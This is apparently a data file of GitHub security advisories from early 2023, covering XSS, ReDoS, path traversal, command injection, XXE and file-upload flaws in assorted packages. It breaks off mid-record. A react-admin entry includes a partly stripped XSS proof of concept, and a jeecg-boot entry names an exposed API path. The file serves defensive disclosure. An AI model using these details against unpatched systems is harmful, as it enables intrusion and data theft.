'https://lists.apache.org/thread/ggozxorctn3tdll7bgmpwwcbjnd0s6w7'}]","{'cwe_ids': ['CWE-125'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-02T17:00:28Z', 'nvd_published_at': '2023-02-01T10:15:00Z'}" 1.4.0,GHSA-r77c-qv68-j3pp,2023-02-14T21:34:31Z,2023-02-04T09:30:21Z,,['CVE-2018-25080'],Cross-site Scripting in MobileDetect,"A vulnerability, which was classified as problematic, has been found in MobileDetect 2.8.31. This issue affects the function initLayoutType of the file examples/session_example.php of the component Example. The manipulation of the argument $_SERVER['PHP_SELF'] leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 2.8.32 is able to address this issue. The name of the patch is 31818a441b095bdc4838602dbb17b8377d1e5cce. It is recommended to upgrade the affected component. The identifier VDB-220061 was assigned to this vulnerability.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'mobiledetect/mobiledetectlib'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.8.32'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2018-25080'}, {'type': 'WEB', 'url': 'https://github.com/serbanghita/Mobile-Detect/pull/741'}, {'type': 'WEB', 'url': 'https://github.com/serbanghita/Mobile-Detect/commit/31818a441b095bdc4838602dbb17b8377d1e5cce'}, {'type': 'PACKAGE', 'url': 'https://github.com/serbanghita/Mobile-Detect'}, {'type': 'WEB', 'url': 'https://github.com/serbanghita/Mobile-Detect/releases/tag/2.8.32'}, {'type': 'WEB', 'url': 'https://vuldb.com/?ctiid.220061'}, {'type': 'WEB', 'url': 'https://vuldb.com/?id.220061'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-14T21:34:31Z', 'nvd_published_at': '2023-02-04T08:15:00Z'}" 1.4.0,GHSA-xr9w-x6gw-c9mj,2023-04-03T17:18:44Z,2023-02-25T06:30:21Z,2023-04-03T17:18:44Z,[],Duplicate advisory: Deno vulnerable to Regular Expression Denial of Service,"## Duplicate Advisory This advisory has been withdrawn because it is a duplicate of [GHSA-jc97-h3h9-7xh6](https://github.com/advisories/GHSA-jc97-h3h9-7xh6). This link is maintained to preserve external references. ## Original Description Versions of the package deno before 1.31.0 are vulnerable to Regular Expression Denial of Service (ReDoS) due to the upgradeWebSocket function, which contains regexes in the form of /s*,s*/, used for splitting the Connection/Upgrade header. A specially crafted Connection/Upgrade header can be used to significantly slow down a web socket server. This issue has been patched in version 1.31.0.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'deno'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.31.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-26103'}, {'type': 'WEB', 'url': 'https://github.com/denoland/deno/pull/17722'}, {'type': 'WEB', 'url': 'https://github.com/denoland/deno/commit/cf06a7c7e672880e1b38598fe445e2c50b4a9d06'}, {'type': 'PACKAGE', 'url': 'https://github.com/denoland/deno'}, {'type': 'WEB', 'url': 'https://github.com/denoland/deno/blob/2b247be517d789a37e532849e2e40b724af0918f/ext/http/01_http.js%23L395-L409'}, {'type': 'WEB', 'url': 'https://github.com/denoland/deno/releases/tag/v1.31.0'}, {'type': 'WEB', 'url': 'https://security.snyk.io/vuln/SNYK-RUST-DENO-3315970'}]","{'cwe_ids': ['CWE-1333'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-28T14:00:55Z', 'nvd_published_at': '2023-02-25T05:15:00Z'}" 1.4.0,GHSA-q264-w97q-q778,2023-05-10T17:20:51Z,2023-02-10T23:08:06Z,,['CVE-2023-23625'],Denial of service via HAMT Decoding Panics,"### Impact Trying to read malformed HAMT sharded directories can cause panics and virtual memory leaks. If you are reading untrusted user input, an attacker can then trigger a panic. This is caused by bogus `fanout` parameter in the HAMT directory nodes. This include checks returned in [ipfs/go-bitfield GHSA-2h6c-j3gf-xp9r](https://github.com/ipfs/go-bitfield/security/advisories/GHSA-2h6c-j3gf-xp9r), as well as limiting the `fanout` to `<= 1024` (to avoid attempts of arbitrary sized allocations). ### Patches - https://github.com/ipfs/go-unixfs/commit/dbcc43ec3e2db0d01e8d80c55040bba3cf22cb4b ### Workarounds Do not feed untrusted user data to the decoding functions. ### References - https://github.com/ipfs/go-bitfield/security/advisories/GHSA-2h6c-j3gf-xp9r ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/ipfs/go-unixfs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.4.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/ipfs/go-unixfs/security/advisories/GHSA-q264-w97q-q778'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-23625'}, {'type': 'WEB', 'url': 'https://github.com/ipfs/go-unixfs/commit/467d139a640ecee4f2e74643dafcc58bb3b54175'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-q264-w97q-q778'}, {'type': 'PACKAGE', 'url': 'https://github.com/ipfs/go-unixfs'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2023-1557'}]","{'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-10T23:08:06Z', 'nvd_published_at': '2023-02-09T21:15:00Z'}" 1.4.0,GHSA-7h4w-6p98-r3wx,2023-02-22T00:11:02Z,2023-02-21T15:30:23Z,,['CVE-2021-32854'],textAngular Cross-site Scripting vulnerability,"textAngular is a text editor for Angular.js. Version 1.5.16 and prior are vulnerable to copy-paste cross-site scripting (XSS). For this particular type of XSS, the victim needs to be fooled into copying a malicious payload into the text editor. There are no known patches.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'textangular'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.5.16'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32854'}, {'type': 'PACKAGE', 'url': 'https://github.com/textAngular/textAngular'}, {'type': 'ADVISORY', 'url': 'https://securitylab.github.com/advisories/GHSL-2021-1001-textAngular/'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-22T00:11:02Z', 'nvd_published_at': '2023-02-21T15:15:00Z'}" 1.4.0,GHSA-jrmh-v64j-mjm9,2023-03-02T19:56:37Z,2023-02-18T00:31:59Z,,['CVE-2023-0482'],Insecure Temporary File in RESTEasy,"In RESTEasy the insecure File.createTempFile() is used in the DataSourceProvider, FileProvider and Mime4JWorkaround classes which creates temp files with insecure permissions that could be read by a local user.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jboss.resteasy:resteasy-undertow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '6.2.2.Final'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0482'}, {'type': 'WEB', 'url': 'https://github.com/resteasy/resteasy/pull/3409/commits/807d7456f2137cde8ef7c316707211bf4e542d56'}, {'type': 'PACKAGE', 'url': 'https://github.com/resteasy/Resteasy'}, {'type': 'WEB', 'url': 'https://issues.redhat.com/browse/RESTEASY-3286'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20230427-0001/'}]","{'cwe_ids': ['CWE-378'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-18T02:18:19Z', 'nvd_published_at': '2023-02-17T22:15:00Z'}" 1.4.0,GHSA-5h4j-qrvg-9xhw,2023-02-16T21:52:40Z,2023-02-16T18:44:47Z,,['CVE-2023-25653'],Improper calculations in ECC implementation can trigger a Denial-of-Service (DoS),"### Description When using the non-default ""fallback"" crypto back-end, ECC operations in `node-jose` can trigger a Denial-of-Service (DoS) condition, due to a possible infinite loop in an internal calculation. For some ECC operations, this condition is triggered randomly; for others, it can be triggered by malicious input. #### Technical summary The JOSE logic implemented by `node-jose` usually relies on an external cryptographic library for the underlying cryptographic primitives that JOSE operations require. When WebCrypto or the Node `crypto` module are available, they are used. When neither of these libraries is available, `node-jose` includes its own ""fallback"" implementations of some algorithms based on `node-forge`, in particular implementations of ECDH and ECDSA. A various points, these algorithm implementations need to compute to the X coordinate of an elliptic curve point. This is done by calling the `getX()` method of the object representing the point, which is an alias of the function `pointFpGetX()` in `lib/deps/ecc/math.js`. Computing the X coordinate from the form in which the point is stored requires computing the modular inverse of the Z coordinate, using the `modInverse` function from the `jsbn` library (e.g., `this.z.modInverse(this.curve.p)`). The output of this function call is multiplied by another value before being reduced with the `barrettReduce()` function. The root cause of this issue is that the `jsbn` `modInverse` function sometimes returns negative results. These results are correct in that they are equivalent mod the relevant modulus, but can be problematic for functions that expect modular operations to always return positive results (in the range `[0, p)`, where `p` is the modulus). In particular, while the Barrett reduction algorithm in general can handle negative inputs, the implementation in `node-jose` explicitly does not. Therefore, while the negative value that is returned by `modInverse()` is mathematically correct, it leads to an error in `barrettReduce()` causing an infinite loop which may result in a Denial of Service condition. For a given prime modulus, we estimate that roughly one in every `2^20` inputs produce a negative `modInverse()`. This estimate was validated with exhaustive testing on small primes (<30 bits) and randomized testing with regard to the P-256 prime. ### Impact This issue is only present in situations where the ""fallback"" cryptographic implementation is being used, i.e., situations where neither WebCrypto nor the Node `crypto` module is available. The following elliptic curve algorithms are impacted by this issue (all in `lib/deps/ecc/index.js`): - Elliptic curve key generation (`exports.generateKeyPair`) - Converting an elliptic curve private key to a public key (`ECPrivateKey.prototype.toPublicKey`) - ECDSA signing (`ECPrivateKey.prototype.sign`) - ECDSA verification (`ECPublicKey.prototype.verify`) - ECDH key agreement (`ECPrivateKey.prototype.computeSecret`) In the first three cases, the points being evaluated are generated randomly, so an attack could only arise due to a bad value being randomly selected (as noted above, with probability roughly `2^{-20}`). In the latter two cases, the points being evaluated are provided from outside the library, and thus potentially by attackers. ### Patches _Has the problem been patched? What versions should users upgrade to?_ ### Workarounds Since this issue is only present in the ""fallback"" crypto implementation, it can be avoided by ensuring that either WebCrypto or the Node `crypto` module is available in the JS environment where `node-jose` is being run. ### References - [Barrett reduction on Wikipedia](https://en.wikipedia.org/wiki/Barrett_reduction) ### For more information If you have any questions or comments about this advisory: * Open an issue in [cisco/node-jose](https://github.com/cisco/node-jose/issues) * Email [Cisco open source security](mailto:oss-security@cisco.com) ### Credits - Research and disclosure: BlackBerry - Fix implementation: [Richard Barnes (@bifurcation)](https://github.com/bifurcation) - Release engineering: [Stephen Augustus (@justaugustus)](https://github.com/justaugustus) ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'node-jose'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.2.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/cisco/node-jose/security/advisories/GHSA-5h4j-qrvg-9xhw'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25653'}, {'type': 'WEB', 'url': 'https://github.com/cisco/node-jose/commit/901d91508a70e3b9bdfc45688ea07bb4e1b8210d'}, {'type': 'PACKAGE', 'url': 'https://github.com/cisco/node-jose'}]","{'cwe_ids': ['CWE-835'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-16T18:44:47Z', 'nvd_published_at': '2023-02-16T19:15:00Z'}" 1.4.0,GHSA-53jx-vvf9-4x38,2023-02-10T03:27:58Z,2023-02-10T03:27:58Z,,['CVE-2023-24815'],StaticHandler disclosure of classpath resources on Windows when mounted on a wildcard route,"### Summary When running vertx web applications that serve files using `StaticHandler` on Windows Operating Systems and Windows File Systems, if the mount point is a wildcard (`*`) then an attacker can exfiltrate any class path resource. ### Details When computing the relative path to locate the resource, in case of wildcards, the code: https://github.com/vert-x3/vertx-web/blob/62c0d66fa1c179ae6a4d57344631679a2b97e60f/vertx-web/src/main/java/io/vertx/ext/web/impl/Utils.java#L83 returns the user input (without validation) as the segment to lookup. Even though checks are performed to avoid escaping the sandbox, given that the input was not sanitized `\` are not properly handled and an attacker can build a path that is valid within the classpath. ### PoC https://github.com/adrien-aubert-drovio/vertx-statichandler-windows-traversal-path-vulnerability","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'io.vertx:vertx-web'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.3.8'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/vert-x3/vertx-web/security/advisories/GHSA-53jx-vvf9-4x38'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-24815'}, {'type': 'WEB', 'url': 'https://github.com/vert-x3/vertx-web/commit/9e3a783b1d1a731055e9049078b1b1494ece9c15'}, {'type': 'PACKAGE', 'url': 'https://github.com/vert-x3/vertx-web'}, {'type': 'WEB', 'url': 'https://github.com/vert-x3/vertx-web/blob/62c0d66fa1c179ae6a4d57344631679a2b97e60f/vertx-web/src/main/java/io/vertx/ext/web/impl/Utils.java#L83'}]","{'cwe_ids': ['CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-10T03:27:58Z', 'nvd_published_at': '2023-02-09T18:15:00Z'}" 1.4.0,GHSA-8h3g-hcwp-6hxq,2023-02-13T20:51:29Z,2023-02-06T06:30:25Z,,['CVE-2022-25853'],semver-tags is vulnerable to Command Injection via the getGitTagsRemote function,All versions of the package semver-tags are vulnerable to Command Injection via the getGitTagsRemote function due to improper input sanitization.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'semver-tags'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.4.10'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-25853'}, {'type': 'PACKAGE', 'url': 'https://github.com/jtrussell/semver-tags'}, {'type': 'WEB', 'url': 'https://github.com/jtrussell/semver-tags/blob/db1ba680bafed0d51e1bb36bd38f2c5439fe8b00/lib/get-tags.js#L21'}, {'type': 'WEB', 'url': 'https://github.com/jtrussell/semver-tags/blob/db1ba680bafed0d51e1bb36bd38f2c5439fe8b00/lib/get-tags.js%23L21'}, {'type': 'WEB', 'url': 'https://security.snyk.io/vuln/SNYK-JS-SEMVERTAGS-3175612'}]","{'cwe_ids': ['CWE-77'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-07T20:08:41Z', 'nvd_published_at': '2023-02-06T05:15:00Z'}" 1.4.0,GHSA-r6ch-mqf9-qc9w,2023-02-16T20:46:10Z,2023-02-16T20:46:10Z,,['CVE-2023-24807'],Regular Expression Denial of Service in Headers,"### Impact The `Headers.set()` and `Headers.append()` methods are vulnerable to Regular Expression Denial of Service (ReDoS) attacks when untrusted values are passed into the functions. This is due to the inefficient regular expression used to normalize the values in the `headerValueNormalize()` utility function. ### Patches This vulnerability was patched in v5.19.1. ### Workarounds There is no workaround. Please update to an unaffected version. ### References * https://hackerone.com/bugs?report_id=1784449 ### Credits Carter Snook reported this vulnerability. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'undici'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.19.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/nodejs/undici/security/advisories/GHSA-r6ch-mqf9-qc9w'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-24807'}, {'type': 'WEB', 'url': 'https://github.com/nodejs/undici/commit/f2324e549943f0b0937b09fb1c0c16cc7c93abdf'}, {'type': 'PACKAGE', 'url': 'https://github.com/nodejs/undici'}, {'type': 'WEB', 'url': 'https://github.com/nodejs/undici/releases/tag/v5.19.1'}, {'type': 'WEB', 'url': 'https://hackerone.com/bugs?report_id=1784449'}]","{'cwe_ids': ['CWE-1333'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-16T20:46:10Z', 'nvd_published_at': '2023-02-16T18:15:00Z'}" 1.4.0,GHSA-6cvf-m58q-h9wf,2023-03-06T19:36:19Z,2023-02-21T15:30:23Z,,['CVE-2023-0934'],Answer vulnerable to Cross-site Scripting,Cross-site Scripting (XSS) - Stored in GitHub repository answerdev/answer prior to 1.0.5.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/answerdev/answer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0934'}, {'type': 'WEB', 'url': 'https://github.com/answerdev/answer/commit/edc06942d51fa8e56a134c5c7e5c8826d9260da0'}, {'type': 'PACKAGE', 'url': 'https://github.com/answerdev/answer'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/cd213098-5bab-487f-82c7-13698ad43b51'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-22T00:09:37Z', 'nvd_published_at': '2023-02-21T15:15:00Z'}" 1.4.0,GHSA-4f48-qpch-4ppx,2023-02-10T00:04:36Z,2023-02-03T18:30:27Z,,['CVE-2021-37305'],Insecure Permissions issue in jeecg-boot,An Insecure Permissions issue in jeecg-boot 2.4.5 and earlier allows remote attackers to gain escalated privilege and view sensitive information via api uri: /sys/user/querySysUser?username=admin.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jeecgframework.boot:jeecg-boot-base'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.4.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37305'}, {'type': 'WEB', 'url': 'https://github.com/jeecgboot/jeecg-boot/issues/2794'}, {'type': 'PACKAGE', 'url': 'https://github.com/jeecgboot/jeecg-boot'}]","{'cwe_ids': ['CWE-732'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-04T00:30:23Z', 'nvd_published_at': '2023-02-03T18:15:00Z'}" 1.4.0,GHSA-vrjv-mxr7-vjf8,2023-03-03T23:17:35Z,2023-02-23T00:30:39Z,,['CVE-2023-26303'],markdown-it-py Denial of Service vulnerability,"Denial of service could be caused to markdown-it-py, before v2.2.0, if an attacker was allowed to force null assertions with specially crafted input.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'markdown-it-py'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.2.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-26303'}, {'type': 'WEB', 'url': 'https://github.com/executablebooks/markdown-it-py/pull/246'}, {'type': 'WEB', 'url': 'https://github.com/executablebooks/markdown-it-py/commit/53ca3e9c2b9e9b295f6abf7f4ad2730a9b70f68c'}, {'type': 'WEB', 'url': 'https://github.com/executablebooks/markdown-it-py/commit/ae03c6107dfa18e648f6fdd1280f5b89092d5d49'}, {'type': 'PACKAGE', 'url': 'https://github.com/executablebooks/markdown-it-py'}]","{'cwe_ids': ['CWE-173'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-23T19:40:55Z', 'nvd_published_at': '2023-02-23T00:15:00Z'}" 1.4.0,GHSA-7j55-28qq-676g,2023-02-23T21:30:58Z,2023-02-15T15:30:40Z,,['CVE-2023-25766'],Missing Authorization in Jenkins Azure Credentials Plugin,A missing permission check in Jenkins Azure Credentials Plugin 253.v887e0f9e898b and earlier allows attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:azure-credentials'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '253.v887e0f9e898b'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25766'}, {'type': 'PACKAGE', 'url': 'https://github.com/jenkinsci/azure-credentials-plugin'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-02-15/#SECURITY-1757'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/02/15/4'}]","{'cwe_ids': ['CWE-862'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-15T18:33:44Z', 'nvd_published_at': '2023-02-15T14:15:00Z'}" 1.4.0,GHSA-q3c8-65q7-9v78,2023-02-10T00:21:34Z,2023-02-03T18:30:26Z,,['CVE-2021-37502'],Cross site scripting in automad/automad,Cross Site Scripting (XSS) vulnerability in automad 1.7.5 allows remote attackers to run arbitrary code via the user name field when adding a user.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'automad/automad'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.8.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37502'}, {'type': 'WEB', 'url': 'https://github.com/marcantondahmen/automad/issues/29'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-04T00:30:20Z', 'nvd_published_at': '2023-02-03T18:15:00Z'}" 1.4.0,GHSA-g857-47pm-3r32,2023-03-08T17:22:00Z,2023-02-27T21:30:30Z,,['CVE-2023-24249'],laravel-admin has Arbitrary File Upload vulnerability,An arbitrary file upload vulnerability in laravel-admin v1.8.19 allows attackers to execute arbitrary code via a crafted PHP file.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'encore/laravel-admin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.8.19'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-24249'}, {'type': 'WEB', 'url': 'https://github.com/z-song/laravel-admin/issues/5726'}, {'type': 'WEB', 'url': 'https://flyd.uk/post/cve-2023-24249/'}, {'type': 'PACKAGE', 'url': 'https://github.com/z-song/laravel-admin'}, {'type': 'WEB', 'url': 'https://laravel-admin.org/'}]","{'cwe_ids': ['CWE-434'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-08T17:22:00Z', 'nvd_published_at': '2023-02-27T19:15:00Z'}" 1.4.0,GHSA-7968-h4m4-ghm9,2023-02-15T18:11:23Z,2023-02-15T18:10:54Z,,['CVE-2023-25156'],No protection against brute-force attacks on login page,"### Impact Previous versions of Kiwi TCMS do not impose rate limits which makes it easier to attempt brute-force attacks against the login page. ### Patches Users should upgrade to v12.0 or later. ### Workarounds Users may install and configure a rate-limiting proxy in front of Kiwi TCMS. For example nginx. ### References [Disclosed by spyata](https://huntr.dev/bounties/2b1a9be9-45e9-490b-8de0-26a492e79795/) ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'kiwitcms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '12.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/kiwitcms/Kiwi/security/advisories/GHSA-7968-h4m4-ghm9'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25156'}, {'type': 'WEB', 'url': 'https://github.com/kiwitcms/Kiwi/commit/0ed213fa0ddb7a6dc77e3c3b99e8fc90ccdaf46f'}, {'type': 'PACKAGE', 'url': 'https://github.com/kiwitcms/Kiwi'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/2b1a9be9-45e9-490b-8de0-26a492e79795/'}, {'type': 'WEB', 'url': 'https://kiwitcms.org/blog/kiwi-tcms-team/2023/02/15/kiwi-tcms-120/'}]","{'cwe_ids': ['CWE-307'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-15T18:10:54Z', 'nvd_published_at': '2023-02-15T15:15:00Z'}" 1.4.0,GHSA-hxjp-q6c3-38fx,2023-02-17T21:32:15Z,2023-02-10T09:30:23Z,,['CVE-2023-22832'],XML External Entity Reference in Apache NiFi,The ExtractCCDAAttributes Processor in Apache NiFi 1.2.0 through 1.19.1 does not restrict XML External Entity references. Flow configurations that include the ExtractCCDAAttributes Processor are vulnerable to malicious XML documents that contain Document Type Declarations with XML External Entity references. The resolution disables Document Type Declarations and disallows XML External Entity resolution in the ExtractCCDAAttributes Processor.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.nifi:nifi'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.2.0'}, {'fixed': '1.20.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-22832'}, {'type': 'WEB', 'url': 'https://github.com/apache/nifi/commit/e966336e8966cf0cbbd12a2c4f2d73a7ceb75cd8'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/b51qs6y7b7r58vovddkv6wc16g2xbl3w'}, {'type': 'WEB', 'url': 'https://nifi.apache.org/security.html#CVE-2023-22832'}]","{'cwe_ids': ['CWE-611'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-10T22:41:43Z', 'nvd_published_at': '2023-02-10T08:15:00Z'}" 1.4.0,GHSA-5jcr-82fh-339v,2023-02-14T00:32:21Z,2023-02-14T00:32:21Z,,['CVE-2023-25572'],Cross-Site-Scripting attack on ``,"### Impact All React applications built with react-admin and using the `` are affected. `` outputs the field value using `dangerouslySetInnerHTML` without client-side sanitization. If the data isn't sanitized server-side, this opens a possible Cross-Site-Scripting (XSS) attack. Proof of concept: ```jsx import { RichTextField } from 'react-admin'; const record = { id: 1, body: `

War and Peace is a novel by the Russian author Leo Tolstoy, published serially, then in its entirety in 1869.

It is regarded as one of Tolstoy's finest literary achievements and remains a classic of world literature.

`, }; const VulnerableRichTextField = () => ( <>

Stolen data:

); ``` ### Patches Versions 3.19.12 and 4.7.6 now use `DOMPurify` to escape the HTML before outputting it with React and `dangerouslySetInnerHTML` ### Workarounds You don't need to upgrade if you already sanitize HTML data server-side. Otherwise, you'll have to replace the `` by a custom field doing sanitization by hand: ```tsx // react-admin v4 import * as React from 'react'; import { memo } from 'react'; import PropTypes from 'prop-types'; import get from 'lodash/get'; import Typography from '@material-ui/core/Typography'; import { useRecordContext, sanitizeFieldRestProps, fieldPropTypes } from 'react-admin'; import purify from 'dompurify'; export const removeTags = (input) => input ? input.replace(/<[^>]+>/gm, '') : ''; const RichTextField = memo( props => { const { className, emptyText, source, stripTags, ...rest } = props; const record = useRecordContext(props); const value = get(record, source); return ( {value == null && emptyText ? ( emptyText ) : stripTags ? ( removeTags(value) ) : ( )} ); } ); RichTextField.defaultProps = { addLabel: true, stripTags: false, }; RichTextField.propTypes = { // @ts-ignore ...Typography.propTypes, ...fieldPropTypes, stripTags: PropTypes.bool, }; RichTextField.displayName = 'RichTextField'; export default RichTextField; ``` ### References https://github.com/marmelab/react-admin/pull/8644, https://github.com/marmelab/react-admin/pull/8645 ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 